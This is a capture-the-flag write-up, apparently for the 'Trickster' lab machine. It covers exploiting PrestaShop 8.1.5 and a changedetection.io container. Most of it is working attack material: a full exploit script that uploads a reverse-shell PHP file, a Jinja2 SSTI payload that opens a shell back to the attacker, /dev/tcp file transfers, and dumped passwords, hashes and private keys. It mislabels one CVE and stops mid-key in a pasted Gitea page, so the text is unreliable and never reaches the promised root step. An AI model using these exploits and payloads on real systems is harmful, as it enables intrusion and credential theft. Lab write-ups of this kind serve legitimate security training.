Week 8. Trickster
TL;DR
This is an Ubuntu 22.04 machine hosting an online shop made with vulnerable PrestaShop CMS (CVE-2024-34716). We exploit this to get an initial shell, then move laterally to a low-priv user after finding credentials in PHP configuration files. Regarding escalation, first we pivot to an internal host that runs a version of changedetection.io vulnerable to SSTI (CVE-2024-34716). Once we gain access to this host, we find credentials to move laterally to another user who has permissions to run as root a vulnerable PrusaSlicer 2.6.1 binary.
KEYWORDS
PrestaShop 8.1.5, CVE-2024-34716, pivoting, changedetection.io 0.45.20, CVE-2024-32651, SSTI, nuclei, brotli, PrusaSlicer 2.6.1.
REFERENCES
https://github.com/lijiejie/GitHack
https://www.cvedetails.com/cve/CVE-2024-34716/
https://github.com/aelmokhtar/CVE-2024-34716
https://www.cvedetails.com/cve/CVE-2024-32651/
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-32651.yaml
https://fileinfo.com/extension/br
https://www.exploit-db.com/exploits/51983
ENUMERATION
Port scan.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-16 13:15 EDT
Nmap scan report for 10.10.11.34
Host is up, received user-set (0.040s latency).
Not shown: 59317 closed tcp ports (conn-refused), 6216 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up) scanned in 13.88 secondsEnumerate the open ports.
> nmap $target -p22,80 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-16 13:16 EDT
Nmap scan report for 10.10.11.34
Host is up, received user-set (0.037s latency).
Scanned at 2024-10-16 13:16:39 EDT for 9s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 8c010e7bb4dab72fbb2fd3a38ca66d87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCk493Dw3qOjrvMEEvPT6uj4aIc7vb9chLLQr0Wzjiaf8hZ1yXMO6kwPuBjNaP6GouvFd0L7UnpacFnIqkQ9GOk=
| 256 90c6f3d83f96999469fed372cbfe6cc5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ3pOUJRCVS6Y1fhIFs4QlMFAh2S8pCDFUCkAfaQFoJw
80/tcp open http syn-ack Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 9.45 secondsUpdate hosts file and enumerate the site with Firefox.
If we navigate thought the web site, we find another subdomain shop.trickster.htb, that seems to have been built with PrestaShop CMS.
If we fuzz for hidden contents we find the .git folder.
> ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -fc 404,403 -e .php,.html,.txt,.md -u http://shop.trickster.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://shop.trickster.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Extensions : .php .html .txt .md
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 20
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404,403
________________________________________________
.git [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 42ms]
.git/HEAD [Status: 200, Size: 28, Words: 2, Lines: 2, Duration: 71ms]
.git/config [Status: 200, Size: 112, Words: 11, Lines: 8, Duration: 68ms]
.git/logs/ [Status: 200, Size: 1137, Words: 77, Lines: 18, Duration: 601ms]
.git/index [Status: 200, Size: 252177, Words: 733, Lines: 978, Duration: 39ms]
:: Progress: [23565/23565] :: Job [1/1] :: 438 req/sec :: Duration: [0:01:07] :: Errors: 0 ::This can be downloaded with GitHack tool (https://github.com/lijiejie/GitHack) so we have a look at the structure of the .git directory.
> ls -ll
total 216
drwxr-xr-x 8 kali kali 4096 Oct 16 13:33 admin634ewutrx1jgitlooaj
-rw-r--r-- 1 kali kali 1305 Oct 16 13:34 autoload.php
-rw-r--r-- 1 kali kali 2506 Oct 16 13:34 error500.html
-rw-r--r-- 1 kali kali 1169 Oct 16 13:34 index.php
-rw-r--r-- 1 kali kali 1256 Oct 16 13:34 init.php
-rw-r--r-- 1 kali kali 522 Oct 16 13:33 Install_PrestaShop.html
-rw-r--r-- 1 kali kali 5054 Oct 16 13:33 INSTALL.txt
-rw-r--r-- 1 kali kali 183862 Oct 16 13:33 LICENSES
-rw-r--r-- 1 kali kali 863 Oct 16 13:33 MakefileNavigate to the admin634ewutrx1jgitlooaj folder and disclose the PrestaShop version installed (8.1.5).
Look for vulnerabilities here: https://www.cvedetails.com/cve/CVE-2024-34716/, and a PoC is available here: https://github.com/aelmokhtar/CVE-2024-34716
If we run it we see it relies on ncat binary, so you may need to make a minor modification to use it with nc or whatever other tool.
> python3 exploit.py --url http://shop.trickster.htb --email aaa@aaa.com --local-ip 10.10.14.211 --admin-path admin634ewutrx1jgitlooaj
[X] Starting exploit with:
Url: http://shop.trickster.htb
Email: aaa@aaa.com
Local IP: 10.10.14.211
Admin Path: admin634ewutrx1jgitlooaj
[X] Ncat is now listening on port 12345. Press Ctrl+C to terminate.
Serving at http.Server on port 5000
Traceback (most recent call last):
File "/home/kali/htb/trickster/shop.trickster.htb/CVE-2024-34716/exploit.py", line 150, in <module>
main()
File "/home/kali/htb/trickster/shop.trickster.htb/CVE-2024-34716/exploit.py", line 121, in main
output = subprocess.call(["ncat", "-lnvp", "12345"], shell=False)
File "/usr/lib/python3.10/subprocess.py", line 345, in call
with Popen(*popenargs, **kwargs) as p:
File "/usr/lib/python3.10/subprocess.py", line 969, in __init__
self._execute_child(args, executable, preexec_fn, close_fds,
File "/usr/lib/python3.10/subprocess.py", line 1845, in _execute_child
raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'ncat'The source code modified to use with nc is this.
import argparse, requests, subprocess, time, threading, atexit, http.server, socketserver,zipfile,shutil,os
from bs4 import BeautifulSoup
print_lock = threading.Lock()
stop_event = threading.Event()
def __parse_args():
parser = argparse.ArgumentParser(description="CVE-2024-34716 Exploit")
parser.add_argument("--url", help="The Presta Shop base url.", required=True)
parser.add_argument("--email", help="The email address of admin user.", required=True)
parser.add_argument("--local-ip", help="Local HTTP Server IP.", required=True)
parser.add_argument("--admin-path", help="The Presta Shop admin path.", required=True)
args = parser.parse_args()
host_url = args.url
email = args.email
local_ip = args.local_ip
admin_path = args.admin_path
print("[X] Starting exploit with:")
print(f"\tUrl: {host_url}")
print(f"\tEmail: {email}")
print(f"\tLocal IP: {local_ip}")
print(f"\tAdmin Path: {admin_path}")
return (host_url, email, local_ip, admin_path)
def send_get_requests(url, interval=5):
while not stop_event.is_set():
try:
response = requests.get(url)
if response.status_code == 504 or response.status_code == 200:
stop_event.set()
return
print(f"GET request to {url}: {response.status_code}")
except requests.RequestException as e:
with print_lock:
print(f"Error during GET request: {e}") # Can comment this out if thread isn't stopped.
time.sleep(interval)
def run_http_server():
PORT = 5000
with socketserver.TCPServer(("", PORT), CustomRequestHandler) as httpd:
with print_lock:
print("Serving at http.Server on port", PORT)
while not stop_event.is_set():
httpd.handle_request()
def main():
host_url, email, local_ip, admin_path = __parse_args()
with open('./exploit.html', 'r') as file:
html_content = file.read()
if host_url[-1] == '/':
host_url = host_url[:-1]
html_content = html_content.replace("BASE_URL", f'"{host_url}"')
html_content = html_content.replace("ATTACKER_IP", f'"{local_ip}"')
html_content = html_content.replace("ATTACKER_PORT", "5000")
html_content = html_content.replace("ADMIN_PATH", f'"{admin_path}"')
html_content = html_content.replace("FILE_NAME", '"ps_next_8_theme_malicious.zip"')
with open('./reverse_shell_template.php', 'r') as file:
reverse_shell_content = file.read()
reverse_shell_content = reverse_shell_content.replace("ATTACKER_IP", f'"{local_ip}"')
reverse_shell_content = reverse_shell_content.replace("ATTACKER_PORT", "12345")
with open('./reverse_shell.php', 'w') as file:
file.write(reverse_shell_content)
shutil.copy('ps_next_8_theme_malicious_old.zip', 'ps_next_8_theme_malicious.zip')
with zipfile.ZipFile('ps_next_8_theme_malicious.zip', 'a') as zipf:
zipf.write('reverse_shell.php','reverse_shell_new.php')
url = f"{host_url}/contact-us"
response = requests.get(url)
response.raise_for_status()
soup = BeautifulSoup(response.text, 'html.parser')
token = soup.find('input', {'name': 'token'})['value']
cookies = response.cookies
files = {
'fileUpload': ('test.png', html_content, 'image/png'),
}
data = {
'id_contact': '2',
'from': email,
'message': 'pwned',
'url': '',
'token': token,
'submitMessage': 'Send'
}
response = requests.post(url, files=files, data=data, cookies=cookies)
url = f"{host_url}/themes/next/reverse_shell_new.php"
req_thread = threading.Thread(target=send_get_requests, args=(url, 15,))
req_thread.daemon = True
req_thread.start()
server_thread = threading.Thread(target=run_http_server)
server_thread.daemon = True
server_thread.start()
if response.status_code == 200:
print(f"[X] nc is now listening on port 12345. Press Ctrl+C to terminate.")
output = subprocess.call(["nc", "-lnvp", "12345"], shell=False)
if b"Ncat: Connection from " in output:
with print_lock:
print("Stopping threads!")
stop_event.set()
else:
print(f"DEBUG:: {output}")
else:
print(f"[!] Failed to send the message. Status code: {response.status_code} Reason: {response.reason}")
def clean():
if os.path.exists('ps_next_8_theme_malicious.zip'):
os.remove('ps_next_8_theme_malicious.zip')
if os.path.exists('reverse_shell.php'):
os.remove('reverse_shell.php')
class CustomRequestHandler(http.server.SimpleHTTPRequestHandler):
def log_request(self, code='-', size='-'):
with print_lock:
print(f"Request: {self.command} {self.path} {self.request_version}")
print(f"Response: {code} {size}")
super().log_request(code, size)
if __name__ == "__main__":
clean()
atexit.register(clean)
main()
It provides a reverse shell as user www-data
> python3 exploit.py --url http://shop.trickster.htb --email aaa@aaa.com --local-ip 10.10.14.211 --admin-path admin634ewutrx1jgitlooaj
Under www-data permissions are usually restricted, a good idea is always to find credentials in PHP configuration files.
> cat /var/www/prestashop/app/config/parameters.php
<?php return array (
'parameters' =>
array (
'database_host' => '127.0.0.1',
'database_port' => '',
'database_name' => 'prestashop',
'database_user' => 'ps_user',
'database_password' => 'prest@shop_o',
'database_prefix' => 'ps_',
'database_engine' => 'InnoDB',
'mailer_transport' => 'smtp',
'mailer_host' => '127.0.0.1',
'mailer_user' => NULL,
'mailer_password' => NULL,
'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
'ps_caching' => 'CacheMemcache',
'ps_cache_enable' => false,
'ps_creation_date' => '2024-05-25',
'locale' => 'en-US',
'use_debug_toolbar' => true,
'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2m3aMt+LV8ERdFsBkj+/OVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
',
'api_private_key' => '-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC5IVA/fGtlxwpt
L9UYoyu/x0XggmH0X02+Y9mqIU2kmcEeF9YTdhUz86sREQYrO2QcWxAZRlcUjCIF
BWzmQAbmN/D6FCuXz34lEPSiBn44dR838KCYzZ6rUf+DEBh9xF/CNKU6HZjMDCku
/C1hcG1Jy7pCpEB2i2iSpbabdoy34tXwRF0WwGSP785V0nyiyW9K3oqB/f0OcGkY
hcCpoVxB0x2r7WVP2iJvLR7HJSSXpolTbVJMVnuQJ/RJ5ynZ/02hoqgHAL2bvTsL
ZQI2QCYHYDbDF/zwEMLsK3BrPANb1Bd0X3ztFTMaP1SsRbBPBgRwlxX+E0Hjvdtz
K1om9jVlAgMBAAECggEAD5CTdKL7TJVNdRyeZ/HgDcGtSFDt92PD34v5kuo14u7i
Y6tRXlWBNtr3uPmbcSsPIasuUVGupJWbjpyEKV+ctOJjKkNj3uGdE3S3fJ/bINgI
BeX/OpmfC3xbZSOHS5ulCWjvs1EltZIYLFEbZ6PSLHAqesvgd5cE9b9k+PEgp50Q
DivaH4PxfI7IKLlcWiq2mBrYwsWHIlcaN0Ys7h0RYn7OjhrPr8V/LyJLIlapBeQV
Geq6MswRO6OXfLs4Rzuw17S9nQ0PDi4OqsG6I2tm4Puq4kB5CzqQ8WfsMiz6zFU/
UIHnnv9jrqfHGYoq9g5rQWKyjxMTlKA8PnMiKzssiQKBgQDeamSzzG6fdtSlK8zC
TXHpssVQjbw9aIQYX6YaiApvsi8a6V5E8IesHqDnS+s+9vjrHew4rZ6Uy0uV9p2P
MAi3gd1Gl9mBQd36Dp53AWik29cxKPdvj92ZBiygtRgTyxWHQ7E6WwxeNUWwMR/i
4XoaSFyWK7v5Aoa59ECduzJm1wKBgQDVFaDVFgBS36r4fvmw4JUYAEo/u6do3Xq9
JQRALrEO9mdIsBjYs9N8gte/9FAijxCIprDzFFhgUxYFSoUexyRkt7fAsFpuSRgs
+Ksu4bKxkIQaa5pn2WNh1rdHq06KryC0iLbNii6eiHMyIDYKX9KpByaGDtmfrsRs
uxD9umhKIwKBgECAXl/+Q36feZ/FCga3ave5TpvD3vl4HAbthkBff5dQ93Q4hYw8
rTvvTf6F9900xo95CA6P21OPeYYuFRd3eK+vS7qzQvLHZValcrNUh0J4NvocxVVn
RX6hWcPpgOgMl1u49+bSjM2taV5lgLfNaBnDLoamfEcEwomfGjYkGcPVAoGBAILy
1rL84VgMslIiHipP6fAlBXwjQ19TdMFWRUV4LEFotdJavfo2kMpc0l/ZsYF7cAq6
fdX0c9dGWCsKP8LJWRk4OgmFlx1deCjy7KhT9W/fwv9Fj08wrj2LKXk20n6x3yRz
O/wWZk3wxvJQD0XS23Aav9b0u1LBoV68m1WCP+MHAoGBANwjGWnrY6TexCRzKdOQ
K/cEIFYczJn7IB/zbB1SEC19vRT5ps89Z25BOu/hCVRhVg9bb5QslLSGNPlmuEpo
HfSWR+q1UdaEfABY59ZsFSuhbqvC5gvRZVQ55bPLuja5mc/VvPIGT/BGY7lAdEbK
6SMIa53I2hJz4IMK4vc2Ssqq
-----END PRIVATE KEY-----
',
),
);Use ps_employee credentials to login into MySQL prestashop database. For this you need to have a full interactive shell first.
Now you can connect to database and dump the hashes.
> mysql -h localhost -u ps_user -pprest@shop_o prestashop
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 2956
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [prestashop]> show tables;
+-------------------------------------------------+
| Tables_in_prestashop |
+-------------------------------------------------+
| ps_access |
| ps_accessory |
| ps_address |
| ps_address_format |
| ps_admin_filter |
| ps_alias |
[...]
| ps_date_range |
| ps_delivery |
| ps_emailsubscription |
| ps_employee |
| ps_employee_session |
| ps_employee_shop |
[...]
| ps_wishlist_product_cart |
| ps_zone |
| ps_zone_shop |
+-------------------------------------------------+
276 rows in set (0.002 sec)
MariaDB [prestashop]> select * from ps_employee;
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
| id_employee | id_profile | id_lang | lastname | firstname | email | passwd | last_passwd_gen | stats_date_from | stats_date_to | stats_compare_from | stats_compare_to | stats_compare_option | preselect_date_range | bo_color | bo_theme | bo_css | default_tab | bo_width | bo_menu | active | optin | id_last_order | id_last_customer_message | id_last_customer | last_connection_date | reset_password_token | reset_password_validity | has_enabled_gravatar |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
| 1 | 1 | 1 | Store | Trickster | admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C | 2024-05-25 13:10:20 | 2024-04-25 | 2024-05-25 | 0000-00-00 | 0000-00-00 | 1 | NULL | NULL | default | theme.css | 1 | 0 | 1 | 1 | NULL | 5 | 0 | 0 | 2024-10-16 | NULL | 0000-00-00 00:00:00 | 0 |
| 2 | 2 | 0 | james | james | james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm | 2024-09-09 13:22:42 | NULL | NULL | NULL | NULL | 1 | NULL | NULL | NULL | NULL | 0 | 0 | 1 | 0 | NULL | 0 | 0 | 0 | NULL | NULL | NULL | 0 |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
2 rows in set (0.000 sec)Crack james hash (module 3200), then SSH in and collect the user flag.
ROOT
Start from shell as user james and take the opportunity to enumerate the user and the system.
> whoami && id
james
uid=1000(james) gid=1000(james) groups=1000(james)
> uname -a && cat /etc/os-release
Linux trickster 5.15.0-121-generic #131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.5 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.5 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammyEnumerate the network config, another docker0 network interface shows up.
> ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:c4:b5:e5:bb txqueuelen 0 (Ethernet)
RX packets 66 bytes 3880 (3.8 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28 bytes 2334 (2.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.34 netmask 255.255.254.0 broadcast 10.10.11.255
ether 00:50:56:94:e5:fd txqueuelen 1000 (Ethernet)
RX packets 214160 bytes 41741950 (41.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 212680 bytes 100387104 (100.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 386954 bytes 606742410 (606.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 386954 bytes 606742410 (606.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth85f1e4d: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
ether ce:75:fe:f7:b1:40 txqueuelen 0 (Ethernet)
RX packets 5 bytes 354 (354.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1 bytes 42 (42.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Now upload a copy of nmap64 (standalone binary or source code) and scan the 172.17.0.0/24 network.
A host with IP address 172.17.0.2 shows up. Let's launch a port scan on it.
Port 5000 appears open. We need a local port forwarding, using the compromised host as a pivot, to reach this port.
> ssh -L 5000:172.17.0.2:5000 james@trickster.htb
Once the port is forwarded it is possible to browse the site locally with Firefox, use the james password to login.
A changedetection.io web page appears. This application allows the user to track changes in websites, it can monitor modifications on web sites and send a notification. It is useful for being notified on changes for news articles, product updates, or any other online content. And also it seems certain versions are vulnerable to SSTI: https://www.cvedetails.com/cve/CVE-2024-32651/. A PoC for this vulnerability is available here:https://blog.hacktivesecurity.com/index.php/2024/05/08/cve-2024-32651-server-side-template-injection-changedetection-io/
Let's follow the indicated procedure. First check with nuclei if the application is vulnerable. Download the template here:https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-32651.yaml
id: CVE-2024-32651
info:
name: Change Detection - Server Side Template Injection
author: edoardottt
severity: critical
description: |
A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-32651
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3
- https://github.com/dgtlmoon/changedetection.io/releases/tag/0.45.21
- https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-32651
cwe-id: CWE-1336
epss-score: 0.00065
epss-percentile: 0.28259
metadata:
verified: true
max-request: 1
shodan-query: html:"Change Detection"
tags: cve,cve2024,changedetection,ssti,rce,passive
http:
- method: GET
path:
- "{{RootURL}}/"
redirects: true
max-redirects: 2
extractors:
- type: xpath
name: version
internal: true
xpath:
- "//*[@id=\"right-sticky\"]"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "Change Detection"
condition: and
- type: dsl
dsl:
- compare_versions(version, '<= 0.45.20')
# digest: 4b0a00483046022100fababded42d7a17ed446608da54c1802c86f5ad0eff6a4f9f9c6299a3d4e0f9e022100843a8f54563f6dd62aa6d9d160e9ad7f886f39d623887bca9819f2e2fbb93ce4:922c64590222798bb761d5b6d8e72950Then run it with nuclei
> /opt/nuclei/nuclei -u http://localhost:5000 -t ./template.yamlThe application is found vulnerable.
If you analyze the template, it just checks the value of right-sticky tag in the web site root source code and compares it with the actual vulnerable version.
Once the vulnerability is confirmed, let's proceed exploiting it.
Start a local server to capture the application requests, then enter our own machine IP in the detection menu and click "Watch" to add it.
Click on "Edit" to configure the detection watch. First we configure the frequency we want our server checked.
Next we click on "Notifications" tab, enter the URL to be used for the reports in the format gets://10.10.xxx.xxx, and our favorite jinja2-based SSTI reverse shell payload.
This payload worked.
{{ self.init.globals.builtins.import('os').system('python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.xxx.xxx",1919));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'') }}Click on "Save", we notice an initial request is received on our local HTTP server. The application is requesting the index.html file and starting to detect modifications.
> php -S 0.0.0.0:80
[Thu Oct 17 09:59:14 2024] PHP 7.4.15 Development Server (http://0.0.0.0:80) started
[Thu Oct 17 10:01:15 2024] 10.10.11.34:41490 Accepted
[Thu Oct 17 10:01:15 2024] 10.10.11.34:41490 [200]: (null) /index.html
[Thu Oct 17 10:01:15 2024] 10.10.11.34:41490 ClosingIt will check and notify every 30 seconds for changes in the index.html page. To send the reverse shell we have to make changes in the index.html file served on our local HTTP server and wait some seconds till the application detects the change and executes the payload (or just click on "Recheck" if we don't want to wait).
When the application notices the web site has changed, a request is received on our HTTP server and then a reverse shell is received on port 1919.
The web application is being run in a container, meaning you have root shell in the container (172.17.0.2), not in the Trickster machine (172.17.0.1).
Looking for ways to escape the container or move laterally, we find database backups in the path /datastore/Backups/. We find two ZIP files: /changedetection-backup-20240830202524.zip and /changedetection-backup-20240830194841.zip
Let's transfer them outside of the container (172.17.0.2) towards the james SSH shell (172.17.0.1). Start a listener on port 7000 on james shell, then send the files from the container.
> cat changedetection-backup-20240830202524.zip > /dev/tcp/172.17.0.1/7000
> cat changedetection-backup-20240830194841.zip > /dev/tcp/172.17.0.1/7000The files are received on james shell.
Inside the ZIP files we find two .txt.br files which are files compressed with brotli https://fileinfo.com/extension/br
Install brotli and uncompress the files.
> brotli -d *.brWe retrieve a TXT file that contains adam database credentials.
This website requires JavaScript.
Explore Help
Register Sign In
james/prestashop
Watch 1
Star 0
Fork 0
You've already forked prestashop
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
main
prestashop / app / config / parameters.php
james 8ee5eaf0bb prestashop
2024-08-30 20:35:25 +01:00
64 lines
3.1 KiB
PHP
Raw Permalink Blame History
< ? php return array (
'parameters' =>
array (
'database_host' => '127.0.0.1' ,
'database_port' => '' ,
'database_name' => 'prestashop' ,
'database_user' => 'adam' ,
'database_password' => 'adam_admin992' ,
'database_prefix' => 'ps_' ,
'database_engine' => 'InnoDB' ,
'mailer_transport' => 'smtp' ,
'mailer_host' => '127.0.0.1' ,
'mailer_user' => NULL ,
'mailer_password' => NULL ,
'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog' ,
'ps_caching' => 'CacheMemcache' ,
'ps_cache_enable' => false ,
'ps_creation_date' => '2024-05-25' ,
'locale' => 'en-US' ,
'use_debug_toolbar' => true ,
'cookie_key' => '8PR6s1SCD3cLk5GpvkGAZ4K9hMXpx2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i' ,
'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g' ,
'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03fbb7f2fb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47' ,
'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2meozijOIJFPFPkpoFKPdVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
' ,
'api_private_key' => '-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC5IVA/fGtlxwpt
L9UYoyu/x0XggmH0X02+Y9mqIU2kmcEeF9YTdhUz86sREQYrO2QcWxAZRlcUjCIF
BWzmQAbmN/D6FCuXz34lEPSiBn44dR838KCYzZ6rUf+DEBh9xF/CNKU6HZjMDCku
/C1hcG1Jy7pCpEB2i2iSpbabdoy34tXwRF0WwGSP785V0nyiyW9K3oqB/f0OcGkY
hcCpoVxB0x2r7WVP2iJvLR7HJSSXpolTbVJMVnuQJ/RJ5ynZ/02hoqgHAL2bvTsL
ZQI2QCYHYDbDF/zwEMLsK3BrPANb1Bd0X3ztFTMaP1SsRbBPBgRwlxX+E0Hjvdtz
K1om9jVlAgMBAAECggEAD5CTdKL7TJVNdRyeZ/HgDcGtSFDt92PD34v5kuo14u7i
Y6tRXlWBNtr3uPmbcSsPIasuUVGupJWbjpyEKV+ctOJjKkNj3uGdE3S3fJ/bINgI
BeX/OpmfC3xbZSOHS5ulCWjvs1EltZIYLFEbZ6PSLHAqesvgd5cE9b9k+PEgp50Q
DivaH4PxfI7IKLlcWiq2mBrYwsWHIlcaN0Ys7h0RYn7OjhrPr8V/LyJLIlapBeQV
Geq6MswRO6OXfLs4Rzuw1dedDPdDZFdSaef6I2tm4Puq4kB5CzqQ8WfsMiz6zFU/
